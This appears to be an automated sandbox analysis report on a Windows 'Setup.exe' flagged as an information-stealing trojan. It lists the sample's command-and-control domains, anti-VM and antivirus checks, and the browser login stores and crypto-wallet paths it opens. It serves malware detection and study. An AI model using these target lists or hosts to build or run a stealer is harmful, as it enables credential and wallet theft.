              Source: Setup.exe, 00000000.00000003.1827827492.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2005455140.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1817486494.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043435488.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1994725877.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click:443/api
              Source: Setup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: Setup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Setup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: Setup.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: Setup.exe, 00000000.00000003.1829687850.00000000031A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Setup.exe, 00000000.00000003.1967747758.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Setup.exe, 00000000.00000003.1967747758.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Setup.exe, 00000000.00000003.1829687850.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1953120474.0000000003157000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1829793650.0000000003157000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1952888844.0000000003157000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Setup.exe, 00000000.00000003.1829793650.0000000003132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Setup.exe, 00000000.00000003.1829687850.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1953120474.0000000003157000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1829793650.0000000003157000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1952888844.0000000003157000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Setup.exe, 00000000.00000003.1829793650.0000000003132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Setup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: Setup.exe, 00000000.00000003.1817406294.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1817384635.000000000092A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1827827492.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
              Source: Setup.exe, 00000000.00000003.1817406294.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1817384635.000000000092A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
              Source: Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Setup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Setup.exe, 00000000.00000003.1967747758.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Setup.exe, 00000000.00000003.1967747758.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Setup.exe, 00000000.00000003.1967747758.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Setup.exe, 00000000.00000003.1967747758.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Setup.exe, 00000000.00000003.1967747758.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49746 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121F690_3_03121F69
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121F690_3_03121F69
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121F690_3_03121F69
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121DB60_3_03121DB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121DB60_3_03121DB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121DB60_3_03121DB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121F690_3_03121F69
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121F690_3_03121F69
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121F690_3_03121F69
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121DB60_3_03121DB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121DB60_3_03121DB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121DB60_3_03121DB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121F690_3_03121F69
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121F690_3_03121F69
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121F690_3_03121F69
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121DB60_3_03121DB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121DB60_3_03121DB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03121DB60_3_03121DB6
              Source: Setup.exeStatic PE information: invalid certificate
              Source: Setup.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Setup.exe, 00000000.00000003.1829484140.0000000003136000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1952949565.0000000003118000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Setup.exeReversingLabs: Detection: 52%
              Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Setup.exeStatic file information: File size 3317708 > 1048576
              Source: Setup.exeStatic PE information: real checksum: 0x1607a5e should be: 0x32f6c2
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0312170C pushad ; retf 0_3_03121728
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0312170C pushad ; retf 0_3_03121728
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0312170C pushad ; retf 0_3_03121728
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03123CE4 push esi; retf 0_3_03123CE7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03123CE4 push esi; retf 0_3_03123CE7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03123CE4 push esi; retf 0_3_03123CE7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0093C314 push 6C6C6670h; ret 0_3_0093C319
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00938778 push eax; iretd 0_3_0093877D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0093C314 push 6C6C6670h; ret 0_3_0093C319
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00938778 push eax; iretd 0_3_0093877D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0312170C pushad ; retf 0_3_03121728
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0312170C pushad ; retf 0_3_03121728
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0312170C pushad ; retf 0_3_03121728
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03123CE4 push esi; retf 0_3_03123CE7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03123CE4 push esi; retf 0_3_03123CE7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03123CE4 push esi; retf 0_3_03123CE7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0093C314 push 6C6C6670h; ret 0_3_0093C319
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00938778 push eax; iretd 0_3_0093877D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00945E17 push FFFFFFD8h; retf 0_3_00945F28
              Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exe TID: 7560Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Setup.exe TID: 7560Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Setup.exeBinary or memory string: VMCiZ4
              Source: Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043435488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1817406294.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043397401.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1827827492.00000000008DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043435488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1817406294.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1827827492.00000000008DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Setup.exe, 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
              Source: Setup.exe, 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
              Source: Setup.exe, 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
              Source: Setup.exe, 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
              Source: Setup.exe, 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
              Source: Setup.exe, 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
              Source: Setup.exe, 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
              Source: Setup.exe, 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
              Source: Setup.exe, 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: cheapptaxysu.click
              Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043435488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2044054138.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2005420910.0000000000951000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 7412, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: Setup.exe, 00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Setup.exeString found in binary or memory: ExodusWeb3
              Source: Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: Setup.exe, 00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Setup.exe, 00000000.00000003.1994725877.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
